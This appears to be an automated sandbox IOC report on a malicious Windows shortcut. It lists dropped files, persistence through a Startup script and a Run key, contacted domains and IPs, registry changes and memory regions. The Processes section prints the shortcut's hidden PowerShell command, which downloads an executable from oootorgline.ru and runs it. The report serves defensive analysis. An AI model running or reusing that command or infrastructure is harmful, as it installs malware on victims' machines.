IOC Report
RTGS-WB-ABS-240730-NEW.lnk

loading gif

Files

File Path
Type
Category
Malicious
RTGS-WB-ABS-240730-NEW.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Sun Nov 17 02:57:57 2019, mtime=Sun Nov 17 02:57:57 2019, atime=Wed Oct 29 01:16:41 2014, length=478720, window=hide
initial sample
malicious
C:\Users\user\AppData\Local\Temp\file.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aWUFv.exe.log
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_03z3klie.fhq.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy0shnp.1z5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\flexuoseness
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\746c438e21160650.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G43DTOBPZAS7WZLARAO3.temp
data
dropped
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
modified
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 3 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri https://oootorgline.ru/components/grace.exe -OutFile C:\Users\user\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\user\AppData\Local\Temp\file.exe' }"
malicious
C:\Users\user\AppData\Local\Temp\file.exe
"C:\Users\user\AppData\Local\Temp\file.exe"
malicious
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
"C:\Users\user\AppData\Local\Temp\file.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\user\AppData\Local\Temp\file.exe"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs"
malicious
C:\Users\user\AppData\Local\unspattered\recomplaint.exe
"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
malicious
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
malicious
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
"C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 2 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://oootorgline.ru
unknown
malicious
https://oootorgline.ru/components/grace.exe
176.99.3.36
malicious
https://api.ipify.org/
172.67.74.152
http://nuget.org/NuGet.exe
unknown
https://api.ipify.org
unknown
http://crl.m
unknown
https://account.dyn.com/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
http://ip-api.com
unknown
https://contoso.com/Icon
unknown
http://oootorgline.ru
unknown
https://aka.ms/pscore68
unknown
https://api.ipify.org/t
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://techniqueqatar.com
unknown
https://github.com/Pester/Pester
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 13 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
techniqueqatar.com
208.91.198.176
malicious
oootorgline.ru
176.99.3.36
malicious
ip-api.com
208.95.112.1
malicious
171.39.242.20.in-addr.arpa
unknown
malicious
api.ipify.org
172.67.74.152

IPs

IP
Domain
Country
Malicious
208.91.198.176
techniqueqatar.com
United States
malicious
208.95.112.1
ip-api.com
United States
malicious
176.99.3.36
oootorgline.ru
Russian Federation
malicious
104.26.13.205
unknown
United States
172.67.74.152
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RegSvcs_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
aWUFv
There are 20 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2944000
trusted library allocation
page read and write
malicious
2989000
trusted library allocation
page read and write
malicious
402000
system
page execute and read and write
malicious
3414000
trusted library allocation
page read and write
malicious
3446000
trusted library allocation
page read and write
malicious
343E000
trusted library allocation
page read and write
malicious
4AB000
unkown
page readonly
482000
unkown
page readonly
6E4E000
stack
page read and write
409A000
heap
page read and write
4B3000
unkown
page readonly
410C000
heap
page read and write
586E000
stack
page read and write
432A000
heap
page read and write
DD0000
heap
page read and write
3D5B000
heap
page read and write
432F000
heap
page read and write
408E000
heap
page read and write
432D000
heap
page read and write
408E000
heap
page read and write
5CB3000
heap
page read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
E23000
heap
page read and write
401C000
heap
page read and write
409A000
heap
page read and write
BAE000
stack
page read and write
45AF000
heap
page read and write
6E60000
heap
page read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
BF0000
trusted library allocation
page read and write
45A5000
heap
page read and write
26B0000
heap
page execute and read and write
2213F900000
heap
page read and write
409A000
heap
page read and write
2213F7D4000
heap
page read and write
500000
unkown
page readonly
14D0000
heap
page read and write
635F000
stack
page read and write
408E000
heap
page read and write
408E000
heap
page read and write
4539000
heap
page read and write
221291B2000
trusted library allocation
page read and write
61EE000
stack
page read and write
3D56000
heap
page read and write
58E4000
heap
page read and write
27D0000
heap
page execute and read and write
409A000
heap
page read and write
DCE000
stack
page read and write
408E000
heap
page read and write
60AE000
stack
page read and write
900000
heap
page read and write
27FC000
stack
page read and write
3176000
trusted library allocation
page read and write
409A000
heap
page read and write
3FBC000
heap
page read and write
3FBC000
heap
page read and write
4094000
heap
page read and write
3FFC000
heap
page read and write
3195000
heap
page read and write
939000
stack
page read and write
3D58000
heap
page read and write
344F000
trusted library allocation
page read and write
409A000
heap
page read and write
77B55BE000
stack
page read and write
3F3E000
heap
page read and write
4D4E000
trusted library allocation
page read and write
3F3E000
heap
page read and write
2FF2000
heap
page read and write
3F3E000
heap
page read and write
625E000
stack
page read and write
410C000
heap
page read and write
4D20000
trusted library allocation
page read and write
3D53000
heap
page read and write
408E000
heap
page read and write
409A000
heap
page read and write
C0D000
trusted library allocation
page execute and read and write
3F3E000
heap
page read and write
410C000
heap
page read and write
3FBC000
heap
page read and write
16B1000
heap
page read and write
4084000
heap
page read and write
4531000
heap
page read and write
409A000
heap
page read and write
22125880000
heap
page read and write
221376BD000
trusted library allocation
page read and write
4534000
heap
page read and write
68CE000
stack
page read and write
7FFD34980000
trusted library allocation
page read and write
6ACE000
stack
page read and write
409A000
heap
page read and write
7FFD3465D000
trusted library allocation
page execute and read and write
6A8E000
stack
page read and write
A90000
heap
page read and write
409A000
heap
page read and write
4536000
heap
page read and write
34D8000
trusted library allocation
page read and write
34E2000
trusted library allocation
page read and write
31D0000
heap
page read and write
410C000
heap
page read and write
45AA000
heap
page read and write
319A000
heap
page read and write
7FFD34770000
trusted library allocation
page execute and read and write
65F8000
heap
page read and write
4AB000
unkown
page readonly
14B7000
trusted library allocation
page execute and read and write
409A000
heap
page read and write
3F3E000
heap
page read and write
4653000
direct allocation
page read and write
409A000
heap
page read and write
30E8000
heap
page read and write
77B61CE000
stack
page read and write
DF0000
heap
page read and write
4FBE000
stack
page read and write
E7F000
heap
page read and write
409A000
heap
page read and write
4533000
heap
page read and write
1390000
trusted library allocation
page read and write
3F3E000
heap
page read and write
6C30000
heap
page read and write
409A000
heap
page read and write
45A0000
heap
page read and write
5DEE000
stack
page read and write
410C000
heap
page read and write
409A000
heap
page read and write
410C000
heap
page read and write
C40000
heap
page read and write
337E000
stack
page read and write
2A15000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
408E000
heap
page read and write
2213F791000
heap
page read and write
3150000
trusted library allocation
page read and write
58DD000
trusted library allocation
page read and write
45AB000
heap
page read and write
45A2000
heap
page read and write
2213FAD9000
heap
page read and write
1384000
trusted library allocation
page read and write
3D54000
heap
page read and write
3D5E000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
34CB000
trusted library allocation
page read and write
408E000
heap
page read and write
432C000
heap
page read and write
508E000
stack
page read and write
4327000
heap
page read and write
34E8000
trusted library allocation
page read and write
1680000
trusted library allocation
page read and write
49ED000
stack
page read and write
3F1C000
heap
page read and write
4530000
heap
page read and write
3D3F000
heap
page read and write
6570000
heap
page read and write
400000
unkown
page readonly
4322000
heap
page read and write
1475000
heap
page read and write
4321000
heap
page read and write
1690000
heap
page read and write
410C000
heap
page read and write
3FBC000
heap
page read and write
7FFD34840000
trusted library allocation
page execute and read and write
410C000
heap
page read and write
33F1000
trusted library allocation
page read and write
3FBD000
heap
page read and write
3FFC000
heap
page read and write
410C000
heap
page read and write
F90000
trusted library allocation
page read and write
432C000
heap
page read and write
486E000
direct allocation
page read and write
3FBC000
heap
page read and write
3192000
heap
page read and write
7FFD34940000
trusted library allocation
page read and write
7FFD3480A000
trusted library allocation
page read and write
409A000
heap
page read and write
486E000
direct allocation
page read and write
22129278000
trusted library allocation
page read and write
77B53B7000
stack
page read and write
410C000
heap
page read and write
7FBA0000
trusted library allocation
page execute and read and write
453B000
heap
page read and write
142E000
heap
page read and write
17DBF6B0000
heap
page read and write
3D56000
heap
page read and write
6C8E000
stack
page read and write
652E000
stack
page read and write
3F3E000
heap
page read and write
3190000
heap
page read and write
453D000
heap
page read and write
4320000
heap
page read and write
53DD000
stack
page read and write
51CF000
stack
page read and write
453E000
heap
page read and write
221255D0000
heap
page read and write
56F0000
heap
page read and write
6C4E000
stack
page read and write
7FFD34700000
trusted library allocation
page read and write
408E000
heap
page read and write
453B000
heap
page read and write
410D000
heap
page read and write
453C000
heap
page read and write
221256D7000
heap
page read and write
4539000
heap
page read and write
45AC000
heap
page read and write
409B000
heap
page read and write
3D59000
heap
page read and write
408E000
heap
page read and write
3F3E000
heap
page read and write
65C0000
trusted library allocation
page read and write
3D50000
heap
page read and write
432A000
heap
page read and write
5FAD000
stack
page read and write
4532000
heap
page read and write
410C000
heap
page read and write
2212574E000
heap
page read and write
3909000
trusted library allocation
page read and write
4FC0000
heap
page execute and read and write
409A000
heap
page read and write
C14000
heap
page read and write
4E90000
trusted library allocation
page read and write
401000
unkown
page execute read
42D94FE000
stack
page read and write
17DBF9E5000
heap
page read and write
221258B0000
heap
page read and write
22137651000
trusted library allocation
page read and write
47FD000
direct allocation
page read and write
4323000
heap
page read and write
6210000
heap
page read and write
4535000
heap
page read and write
409A000
heap
page read and write
34F4000
trusted library allocation
page read and write
410C000
heap
page read and write
409A000
heap
page read and write
5E90000
trusted library allocation
page read and write
A20000
heap
page read and write
4323000
heap
page read and write
3F3E000
heap
page read and write
138D000
trusted library allocation
page execute and read and write
719000
stack
page read and write
4536000
heap
page read and write
C45000
heap
page read and write
453A000
heap
page read and write
410C000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
31E8000
trusted library allocation
page read and write
2213FB07000
heap
page read and write
408E000
heap
page read and write
31A0000
trusted library allocation
page read and write
77B608F000
stack
page read and write
EA0000
heap
page read and write
3D52000
heap
page read and write
3F3E000
heap
page read and write
22128ECD000
trusted library allocation
page read and write
453E000
heap
page read and write
409A000
heap
page read and write
43B1000
trusted library allocation
page read and write
14AA000
trusted library allocation
page execute and read and write
453A000
heap
page read and write
4D30000
trusted library allocation
page read and write
3192000
heap
page read and write
5C6E000
stack
page read and write
45A7000
heap
page read and write
3198000
heap
page read and write
3943000
trusted library allocation
page read and write
28E1000
trusted library allocation
page read and write
58E0000
heap
page read and write
780000
heap
page read and write
319D000
heap
page read and write
2212570E000
heap
page read and write
453A000
heap
page read and write
2213F920000
heap
page read and write
A70000
heap
page read and write
63EF000
stack
page read and write
4D74000
trusted library allocation
page read and write
3FBC000
heap
page read and write
5BF3000
heap
page read and write
66C0000
trusted library allocation
page read and write
77B5279000
stack
page read and write
4653000
direct allocation
page read and write
C1A000
trusted library allocation
page execute and read and write
410C000
heap
page read and write
C48000
heap
page read and write
2212927C000
trusted library allocation
page read and write
3FBC000
heap
page read and write
284F000
stack
page read and write
1370000
trusted library allocation
page read and write
F3A000
stack
page read and write
C34000
heap
page read and write
63AD000
stack
page read and write
FEE000
stack
page read and write
47F9000
direct allocation
page read and write
47FD000
direct allocation
page read and write
4322000
heap
page read and write
3D5C000
heap
page read and write
3FBC000
heap
page read and write
453F000
heap
page read and write
3196000
heap
page read and write
45A6000
heap
page read and write
409A000
heap
page read and write
319E000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
3FBC000
heap
page read and write
409A000
heap
page read and write
3D57000
heap
page read and write
3F3E000
heap
page read and write
22127630000
heap
page execute and read and write
66B8000
trusted library allocation
page read and write
7FFD34930000
trusted library allocation
page read and write
26AE000
stack
page read and write
77B4E7E000
stack
page read and write
3194000
heap
page read and write
77B4BF6000
stack
page read and write
319C000
heap
page read and write
D2E000
stack
page read and write
6DCE000
stack
page read and write
3D5B000
heap
page read and write
4530000
direct allocation
page read and write
ADE000
stack
page read and write
221291AA000
trusted library allocation
page read and write
409A000
heap
page read and write
3FBC000
heap
page read and write
698E000
stack
page read and write
6620000
trusted library allocation
page read and write
3D54000
heap
page read and write
45A3000
heap
page read and write
3F3E000
heap
page read and write
3F3E000
heap
page read and write
4653000
direct allocation
page read and write
2A33000
trusted library allocation
page read and write
2213F7D2000
heap
page read and write
315E000
trusted library allocation
page read and write
E53000
trusted library allocation
page execute and read and write
22125660000
heap
page read and write
29A4000
trusted library allocation
page read and write
BE0000
trusted library allocation
page read and write
409A000
heap
page read and write
45A3000
heap
page read and write
77B553F000
stack
page read and write
221258E5000
heap
page read and write
410C000
heap
page read and write
276E000
stack
page read and write
409A000
heap
page read and write
E2E000
stack
page read and write
ECF000
heap
page read and write
4324000
heap
page read and write
2931000
trusted library allocation
page read and write
3FBC000
heap
page read and write
221274E0000
trusted library allocation
page read and write
49DE000
stack
page read and write
4323000
heap
page read and write
409A000
heap
page read and write
3196000
heap
page read and write
408E000
heap
page read and write
7FFD348B0000
trusted library allocation
page read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
410C000
heap
page read and write
409A000
heap
page read and write
3198000
heap
page read and write
45AC000
heap
page read and write
45A0000
heap
page read and write
409A000
heap
page read and write
B4E000
heap
page read and write
5CD2000
heap
page read and write
4E4E000
stack
page read and write
313E000
stack
page read and write
E50000
trusted library allocation
page execute and read and write
3D55000
heap
page read and write
15FE000
stack
page read and write
409A000
heap
page read and write
15B0000
trusted library allocation
page read and write
EAE000
stack
page read and write
410C000
heap
page read and write
3F3E000
heap
page read and write
C2B000
trusted library allocation
page execute and read and write
317B000
heap
page read and write
410C000
heap
page read and write
410C000
heap
page read and write
7FFD34880000
trusted library allocation
page read and write
4538000
heap
page read and write
AD1000
heap
page read and write
13D8000
heap
page read and write
189E000
stack
page read and write
409A000
heap
page read and write
4DBE000
stack
page read and write
409A000
heap
page read and write
22127520000
heap
page readonly
406D000
heap
page read and write
486E000
direct allocation
page read and write
4536000
heap
page read and write
409A000
heap
page read and write
4EB0000
heap
page read and write
30C0000
direct allocation
page read and write
46D0000
direct allocation
page read and write
343C000
trusted library allocation
page read and write
6690000
heap
page read and write
3FFC000
heap
page read and write
401C000
heap
page read and write
1640000
heap
page read and write
22128C5C000
trusted library allocation
page read and write
3F3E000
heap
page read and write
408E000
heap
page read and write
3CA4000
heap
page read and write
66F0000
trusted library allocation
page read and write
4F8E000
stack
page read and write
3FBC000
heap
page read and write
6F10000
trusted library allocation
page read and write
510B000
stack
page read and write
22128C4A000
trusted library allocation
page read and write
4D30000
trusted library allocation
page read and write
660A000
heap
page read and write
409A000
heap
page read and write
77B52BE000
stack
page read and write
409A000
heap
page read and write
4084000
heap
page read and write
990000
heap
page read and write
432F000
heap
page read and write
3194000
heap
page read and write
453F000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
299B000
trusted library allocation
page read and write
3D56000
heap
page read and write
E2B000
trusted library allocation
page execute and read and write
4653000
direct allocation
page read and write
17DBF860000
heap
page read and write
34DD000
trusted library allocation
page read and write
4DFE000
stack
page read and write
409A000
heap
page read and write
45A0000
heap
page read and write
7FFD348D0000
trusted library allocation
page read and write
12F8000
stack
page read and write
7FFD34810000
trusted library allocation
page execute and read and write
410C000
heap
page read and write
410C000
heap
page read and write
A65000
heap
page read and write
490000
unkown
page write copy
33E6000
trusted library allocation
page read and write
172E000
heap
page read and write
408E000
heap
page read and write
408E000
heap
page read and write
7FAC0000
trusted library allocation
page execute and read and write
51BF000
stack
page read and write
22125668000
heap
page read and write
409A000
heap
page read and write
4534000
heap
page read and write
45AF000
heap
page read and write
4325000
heap
page read and write
2212574A000
heap
page read and write
C10000
trusted library allocation
page read and write
27E1000
trusted library allocation
page read and write
453F000
heap
page read and write
13BE000
heap
page read and write
BF8000
heap
page read and write
453D000
heap
page read and write
3199000
heap
page read and write
BF4000
trusted library allocation
page read and write
3FBC000
heap
page read and write
401000
unkown
page execute read
5B2E000
stack
page read and write
2810000
heap
page read and write
163C000
stack
page read and write
45AE000
heap
page read and write
7FFD34950000
trusted library allocation
page read and write
539E000
stack
page read and write
409A000
heap
page read and write
45A5000
heap
page read and write
3F3E000
heap
page read and write
14B2000
trusted library allocation
page read and write
FA0000
heap
page read and write
77B5439000
stack
page read and write
409A000
heap
page read and write
45AF000
heap
page read and write
3196000
heap
page read and write
6700000
heap
page read and write
409A000
heap
page read and write
22127560000
trusted library allocation
page read and write
3FBC000
heap
page read and write
402C000
heap
page read and write
3FBC000
heap
page read and write
17DBF9E0000
heap
page read and write
42D9BFE000
stack
page read and write
4D56000
trusted library allocation
page read and write
4094000
heap
page read and write
4531000
heap
page read and write
4D80000
heap
page read and write
6560000
heap
page read and write
13DB000
heap
page read and write
4539000
heap
page read and write
C75000
heap
page read and write
27B0000
trusted library allocation
page read and write
3FBC000
heap
page read and write
3196000
heap
page read and write
45A0000
heap
page read and write
3F3E000
heap
page read and write
453D000
heap
page read and write
4326000
heap
page read and write
3FBC000
heap
page read and write
168E000
heap
page read and write
7FFD34990000
trusted library allocation
page read and write
45A2000
heap
page read and write
2F00000
heap
page read and write
C9A000
heap
page read and write
6E50000
trusted library allocation
page execute and read and write
406D000
heap
page read and write
30E4000
heap
page read and write
3FBC000
heap
page read and write
17DC1300000
heap
page read and write
4531000
heap
page read and write
4535000
heap
page read and write
BE0000
trusted library allocation
page read and write
409A000
heap
page read and write
221275A0000
trusted library allocation
page read and write
432A000
heap
page read and write
2213F8F7000
heap
page execute and read and write
4053000
heap
page read and write
174D000
heap
page read and write
45A8000
heap
page read and write
319D000
heap
page read and write
408E000
heap
page read and write
45A2000
heap
page read and write
401000
unkown
page execute read
77B624B000
stack
page read and write
3F3E000
heap
page read and write
22125672000
heap
page read and write
FF0000
heap
page read and write
408E000
heap
page read and write
408E000
heap
page read and write
410C000
heap
page read and write
408E000
heap
page read and write
7FFD34920000
trusted library allocation
page read and write
4324000
heap
page read and write
C27000
heap
page read and write
6F20000
heap
page read and write
3D52000
heap
page read and write
7FFD34801000
trusted library allocation
page read and write
22127640000
heap
page read and write
410C000
heap
page read and write
319E000
heap
page read and write
4539000
heap
page read and write
7FFD34970000
trusted library allocation
page read and write
5AEE000
stack
page read and write
3F3E000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
14BB000
trusted library allocation
page execute and read and write
4533000
heap
page read and write
408E000
heap
page read and write
58B0000
heap
page read and write
4321000
heap
page read and write
4C2000
unkown
page readonly
4326000
heap
page read and write
3FBC000
heap
page read and write
50BF000
stack
page read and write
396C000
trusted library allocation
page read and write
33B1000
trusted library allocation
page read and write
490000
unkown
page write copy
221256FF000
heap
page read and write
401C000
heap
page read and write
E54000
trusted library allocation
page read and write
6581000
heap
page read and write
497E000
stack
page read and write
3D52000
heap
page read and write
410C000
heap
page read and write
5C2E000
stack
page read and write
4322000
heap
page read and write
4323000
heap
page read and write
6615000
heap
page read and write
28D0000
heap
page execute and read and write
1660000
heap
page read and write
17DBF6C3000
heap
page read and write
3190000
heap
page read and write
3D50000
heap
page read and write
EC0000
heap
page read and write
4B3000
unkown
page readonly
77B4EFE000
stack
page read and write
4538000
heap
page read and write
5E70000
trusted library allocation
page read and write
409A000
heap
page read and write
4326000
heap
page read and write
3193000
heap
page read and write
319A000
heap
page read and write
410C000
heap
page read and write
77B56BB000
stack
page read and write
4322000
heap
page read and write
3F3E000
heap
page read and write
22127510000
trusted library allocation
page read and write
38FF000
trusted library allocation
page read and write
47F9000
direct allocation
page read and write
3F3E000
heap
page read and write
6C0D000
stack
page read and write
3FBC000
heap
page read and write
453E000
heap
page read and write
409A000
heap
page read and write
654B000
stack
page read and write
3FBC000
heap
page read and write
17DBF760000
heap
page read and write
401C000
heap
page read and write
409A000
heap
page read and write
409A000
heap
page read and write
3F3E000
heap
page read and write
408E000
heap
page read and write
319E000
heap
page read and write
6F80000
heap
page read and write
408E000
heap
page read and write
DF8000
heap
page read and write
3F3E000
heap
page read and write
3D52000
heap
page read and write
2916000
trusted library allocation
page read and write
34BB000
trusted library allocation
page read and write
3162000
trusted library allocation
page read and write
45A9000
heap
page read and write
400000
unkown
page readonly
292D000
trusted library allocation
page read and write
13CA000
heap
page read and write
3190000
heap
page read and write
17DBF68B000
heap
page read and write
7FFD34960000
trusted library allocation
page read and write
AF9000
stack
page read and write
315B000
trusted library allocation
page read and write
77B51FD000
stack
page read and write
E40000
trusted library allocation
page read and write
22128282000
trusted library allocation
page read and write
319C000
heap
page read and write
A40000
heap
page read and write
3F3E000
heap
page read and write
3F3E000
heap
page read and write
4D76000
trusted library allocation
page read and write
5BF8000
heap
page read and write
BF3000
trusted library allocation
page execute and read and write
409A000
heap
page read and write
29E5000
trusted library allocation
page read and write
409A000
heap
page read and write
6E0E000
stack
page read and write
405C000
heap
page read and write
7FFD34653000
trusted library allocation
page execute and read and write
3D5F000
heap
page read and write
E64000
trusted library allocation
page read and write
4530000
heap
page read and write
410C000
heap
page read and write
77B54BE000
stack
page read and write
3190000
trusted library allocation
page read and write
BF0000
heap
page read and write
4537000
heap
page read and write
E60000
trusted library allocation
page read and write
17DBF6AB000
heap
page read and write
409A000
heap
page read and write
14A2000
trusted library allocation
page read and write
A60000
heap
page read and write
409A000
heap
page read and write
13A0000
heap
page read and write
432A000
heap
page read and write
45AE000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
3D59000
heap
page read and write
2A29000
trusted library allocation
page read and write
22128C30000
trusted library allocation
page read and write
5879000
trusted library allocation
page read and write
408E000
heap
page read and write
46D0000
direct allocation
page read and write
14B0000
trusted library allocation
page read and write
409A000
heap
page read and write
5C14000
heap
page read and write
7FFD3470C000
trusted library allocation
page execute and read and write
E0F000
stack
page read and write
410C000
heap
page read and write
3D5E000
heap
page read and write
7FFD34652000
trusted library allocation
page read and write
2920000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
65C7000
trusted library allocation
page read and write
3FBC000
heap
page read and write
3D58000
heap
page read and write
65D0000
trusted library allocation
page execute and read and write
C00000
trusted library allocation
page read and write
661E000
stack
page read and write
410C000
heap
page read and write
22127882000
trusted library allocation
page read and write
5870000
trusted library allocation
page read and write
2800000
trusted library allocation
page execute and read and write
C6C000
heap
page read and write
3F3E000
heap
page read and write
7FFD349A0000
trusted library allocation
page read and write
3FBC000
heap
page read and write
3D5F000
heap
page read and write
C16000
trusted library allocation
page execute and read and write
4538000
heap
page read and write
2213FA00000
heap
page execute and read and write
BB0000
heap
page read and write
319A000
heap
page read and write
221291AC000
trusted library allocation
page read and write
408E000
heap
page read and write
77B62CD000
stack
page read and write
408E000
heap
page read and write
221255E0000
heap
page read and write
33FD000
trusted library allocation
page read and write
2660000
trusted library allocation
page read and write
408E000
heap
page read and write
4533000
heap
page read and write
3FBC000
heap
page read and write
409A000
heap
page read and write
5CCF000
heap
page read and write
3D53000
heap
page read and write
22125706000
heap
page read and write
22125600000
heap
page read and write
453C000
heap
page read and write
22125720000
heap
page read and write
4D3B000
trusted library allocation
page read and write
45A2000
heap
page read and write
6D8E000
stack
page read and write
3F3E000
heap
page read and write
28EC000
trusted library allocation
page read and write
77B563B000
stack
page read and write
3D54000
heap
page read and write
319E000
heap
page read and write
3D55000
heap
page read and write
3F3E000
heap
page read and write
2851000
trusted library allocation
page read and write
7FFD348E0000
trusted library allocation
page read and write
EB0000
heap
page read and write
409A000
heap
page read and write
179E000
stack
page read and write
FA7000
heap
page read and write
E27000
trusted library allocation
page execute and read and write
4532000
heap
page read and write
4534000
heap
page read and write
4DD0000
trusted library allocation
page execute and read and write
43D9000
trusted library allocation
page read and write
6641000
heap
page read and write
490000
unkown
page write copy
409A000
heap
page read and write
4536000
heap
page read and write
7FFD34736000
trusted library allocation
page execute and read and write
3D5A000
heap
page read and write
3D55000
heap
page read and write
453E000
heap
page read and write
582C000
stack
page read and write
2213F8F0000
heap
page execute and read and write
432B000
heap
page read and write
400000
system
page execute and read and write
139D000
trusted library allocation
page execute and read and write
45A6000
heap
